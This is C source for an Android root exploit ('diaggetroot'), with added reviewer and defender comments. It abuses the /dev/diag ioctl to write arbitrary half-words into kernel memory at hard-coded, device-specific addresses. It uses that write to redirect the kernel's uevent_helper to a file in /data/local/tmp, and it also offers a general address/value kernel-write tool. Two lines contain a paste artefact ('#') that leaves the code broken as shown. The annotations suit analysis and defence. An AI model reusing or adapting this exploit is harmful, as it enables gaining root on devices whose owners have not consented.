- ################## jni.c ###########################
- #include <stdio.h>
- #include <stdint.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <jni.h>
- #include <sys/mman.h>
- #define LOG_TAG "diaggetroot"
- #define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)
- #define LOGD(...) __android_log_print(ANDROID_LOG_DEBUG,LOG_TAG,__VA_ARGS__)
- #define LOGE(...) __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
- #include <android/log.h>
/* One pending 16-bit store: the destination address and the half-word value. */
struct values {
    unsigned addr;
    unsigned short value;
};

/* Implemented in diag.c; takes a target address, a 16-bit value and a descriptor. */
extern void b(void* adr, int value, int fd);

/*
 * qsort() comparator for struct values.
 *
 * Orders entries by their `value` field only (ascending); `addr` is ignored.
 * Returns -1, 0 or 1 for less-than, equal and greater-than respectively.
 */
int cmpare(const void *a, const void *b)
{
    const struct values *lhs = a;
    const struct values *rhs = b;

    /* Branch-free three-way compare; each relational result is 0 or 1. */
    return (lhs->value > rhs->value) - (lhs->value < rhs->value);
}
/*
 * Splits the string "/data/local/tmp/getroot" into 16-bit half-words, pairs
 * each with an address starting at the hard-coded base _buf, sorts the pairs by
 * value and passes every pair to b() (diag.c) together with fd.
 *
 * Defender's reading: _buf is a fixed address in the 0xC0000000 range, and the
 * inline comments label it as the uevent_helper buffer of specific handset
 * models. If that label is accurate, the effect is to replace the kernel's
 * hotplug-helper path with a file in a world-writable directory, which the
 * kernel would then launch with full privileges on the next uevent.
 * Mitigations a reviewer would look for on the platform side:
 *   - the diag ioctl must not write through caller-supplied kernel addresses;
 *   - kernel builds without a writable helper path (CONFIG_UEVENT_HELPER off,
 *     or CONFIG_STATIC_USERMODEHELPER) remove this particular target;
 *   - address-space randomisation invalidates hard-coded addresses like _buf;
 *   - an unexpected value in /sys/kernel/uevent_helper or
 *     /proc/sys/kernel/hotplug is a useful integrity check / detection signal.
 */
static void uevent_helper_mod(int fd)
{
    // unsigned _buf = 0xc0d0dfd0; //htc batterfly uevent_helper_buffer
    unsigned _buf = 0xC0643D20; //is03
    // The explicit "\0" gives the 23-character path a second terminator, so the
    // path[i+1] read on the last iteration (i == 22) stays inside the literal.
    const char* path="/data/local/tmp/getroot\0";
    struct values datas[400];
    int i, j;
    j=0;
    // Two consecutive bytes are packed little-endian into one half-word.
    for(i=0; i<strlen(path); i+=2){
        datas[j].addr = _buf+ i;
        datas[j].value = path[i] | (path[i+1] << 8);
        j++;
    }
    // Entries are issued in ascending order of value, not of address.
    // NOTE(review): the reason for the ordering is not stated on the page.
    qsort( datas, j, sizeof(struct values), cmpare);
    for(i=0; i<j; i++){
        LOGD("data[%d] addr=%x value=%x", i, datas[i].addr, datas[i].value);
        b((void*)datas[i].addr, datas[i].value, fd);
    }
}
/*
 * Issues a 32-bit store as two 16-bit requests: the low half-word goes to
 * `address`, the high half-word to `address + 2`, each via b() (diag.c).
 * The request is echoed to stdout first.
 *
 * Defender's reading: this is a generic "write this value at this address"
 * wrapper with no restriction on the address; whatever protection exists has
 * to come from the driver behind b(), not from this code.
 */
static void write_value(int fd, unsigned address, unsigned value)
{
    // b((void*)0xc0da86d0, 0xa924, fd);
    // b((void*)0xc0da86d2, 0xc034, fd);
    printf("write_value(0x%x, 0x%x)\n", address, value);
    b((void*)address, value & 0xffff, fd);
    // Arithmetic on void* is a GNU extension (byte-sized steps), so this is address + 2 bytes.
    b((void*)address+2, (value >> 16) & 0xffff, fd);
}
/*
 * JNI export bound to com.example.diaggetroot.MainActivity.getrootnative().
 * Forwards the descriptor received from Java straight to uevent_helper_mod();
 * env and thiz are unused.
 *
 * Triage note: an app whose native library exports a symbol like this and
 * also references /dev/diag is a strong static indicator during APK analysis.
 */
void
Java_com_example_diaggetroot_MainActivity_getrootnative( JNIEnv* env,
        jobject thiz, int fd)
{
    uevent_helper_mod(fd);
}
- extern unsigned p_delayed_rsp_id;
/*
 * Command-line entry point. Parses an address and a value from argv[1] and
 * argv[2] (base auto-detected by strtoll), optionally overrides the global
 * p_delayed_rsp_id from argv[3], then calls write_value() with fd 0.
 *
 * NOTE(review): the usage guard tests argc < 2, yet argv[2] is read
 * unconditionally; with exactly one argument argv[2] is NULL and is passed to
 * strtoll(). endptr is never inspected, so malformed numbers are accepted
 * silently, and the strtoll() results are narrowed on assignment.
 */
int main(int argc, char** argv)
{
    unsigned long address = 0;
    unsigned long value = 0;
    char *endptr;
    if(argc < 2) {
        printf("%s address value\n", argv[0]);
        return 0;
    }
    address = strtoll(argv[1], &endptr, 0);
    value = strtoll(argv[2], &endptr, 0);
    if(argc > 3){
        p_delayed_rsp_id = strtoll(argv[3], &endptr, 0);
    }
    // fd 0 is the sentinel that makes b() open /dev/diag itself.
    write_value(0, address, value);
    // uevent_helper_mod(0);
    return 0;
}
- ################## diag.c ###########################
- #include <stdio.h>
- #include <unistd.h>
- #include <errno.h>
- #include <signal.h>
- #include <stdlib.h>
- #include <dlfcn.h>
- #include <elf.h>
- #include <sys/system_properties.h>
- #include <fcntl.h>
- #include <stdarg.h>
- #define LOG_TAG "diaggetroot"
- #define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)
- #define LOGD(...) __android_log_print(ANDROID_LOG_DEBUG,LOG_TAG,__VA_ARGS__)
- #define LOGE(...) __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
- #include <android/log.h>
// Request number used for every ioctl() call in this file.
#define DIAG_IOCTL_GET_DELAYED_RSP_ID 8

/*
 * Argument block handed to that ioctl.
 * NOTE(review): presumably mirrors the driver's own structure; confirm against
 * the driver headers. Both pointer fields are filled in by the caller, which is
 * why the driver must treat them as untrusted user-space addresses.
 */
struct diagpkt_delay_params{
    void *rsp_ptr;        // destination for the response (b2 passes size 2)
    int size;             // size of the rsp_ptr buffer in bytes
    int *num_bytes_ptr;   // destination for a byte count
};

// Hard-coded, device-specific address (b2 tags its use "SH02E"); main() in
// jni.c can replace it from argv[3]. Fixed addresses like this only hold on a
// kernel image whose layout is known and not randomised.
unsigned p_delayed_rsp_id = 0xc0da86ec;
/*
 * Drives the diag ioctl so that the 16-bit quantity at `adr` ends up equal to
 * `value`. Three phases are visible:
 *   1. one ioctl with num_bytes_ptr set to the address held in
 *      p_delayed_rsp_id and rsp_ptr pointing at a local;
 *   2. one ioctl whose result in the local `ptr` is taken as the current
 *      16-bit value returned by the driver;
 *   3. (value - ptr) & 0xffff further ioctls with rsp_ptr set to `adr`.
 * NOTE(review): that the driver returns an incrementing id on each call is
 * inferred from the request name and the loop arithmetic; confirm against the
 * driver source.
 *
 * Defender's reading: rsp_ptr and num_bytes_ptr carry raw addresses chosen by
 * the caller, including addresses in the 0xC0000000 range. This only has an
 * effect if the driver stores through those pointers directly; a handler that
 * uses copy_to_user()/put_user() (or otherwise checks the range) rejects them.
 * Other controls: restrict who may open the device node (file mode, SELinux
 * policy) and drop the diag driver from production builds. Detection: a single
 * process issuing up to 65535 identical ioctls on this device per half-word is
 * highly anomalous.
 */
static void b2(void* adr, int value, int fd)
{
    uint16_t ptr;
    int i;
    int num;
    int ret;   // NOTE(review): assigned from every ioctl() but never checked
    struct diagpkt_delay_params p;
    ptr = 0;
    p.rsp_ptr = &ptr;
    p.size = 2;
    p.num_bytes_ptr = (void*)p_delayed_rsp_id; // SH02E
    // p.num_bytes_ptr = (void*)0xC06485A8; // IS03
    // p.num_bytes_ptr = (void*)0xc0ba8394; // HTC butterfly
    ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
    ptr = 0;
    p.rsp_ptr = &ptr;
    p.size = 2;
    num = 0;
    // NOTE(review): '#' is not valid C here; it looks like an HTML-entity
    // artefact of the paste that swallowed a pointer expression (presumably the
    // address of the local `num`, which is zeroed on the previous line).
    p.num_bytes_ptr = #
    ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
    // Number of further calls needed, modulo 2^16, to reach `value` from the
    // value just read back.
    ptr = (value - ptr) & 0xffff;
    LOGD("loop = %x\n", ptr);
    printf("loop = %x\n", ptr);
    for(i=0; i< ptr; i++) {
        num = 0;
        p.rsp_ptr = adr;   // caller-chosen destination, passed to the driver as-is
        p.size = 2;
        // NOTE(review): same paste artefact as above.
        p.num_bytes_ptr = #
        ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
    }
}
/*
 * Public wrapper around b2(). An fd of 0 means "no descriptor supplied": the
 * function opens /dev/diag read-write once, caches it in the static fd2 and
 * uses that. A negative descriptor is logged and the call is abandoned.
 *
 * NOTE(review): a failed open() leaves -1 in fd2; because the cache test is
 * fd2 == 0, later calls reuse -1 and never retry. Using 0 as the sentinel also
 * means a real descriptor 0 can never be passed through.
 *
 * Defender's reading: everything in this file depends on the calling process
 * being allowed to open /dev/diag O_RDWR. Tight permissions on the device node
 * and an SELinux policy that denies it to app domains remove that precondition.
 */
void b(void* adr, int value, int fd)
{
    static int fd2;
    // printf("delayed_rsp_id = 0x%x\n", p_delayed_rsp_id);
    if(fd == 0){
        if(fd2 == 0){
            fd2 = open("/dev/diag", O_RDWR);
        }
        fd = fd2;
    }
    if(fd < 0) {
        LOGE("fd=%d", fd);
        return;
    }
    b2(adr, value, fd);
}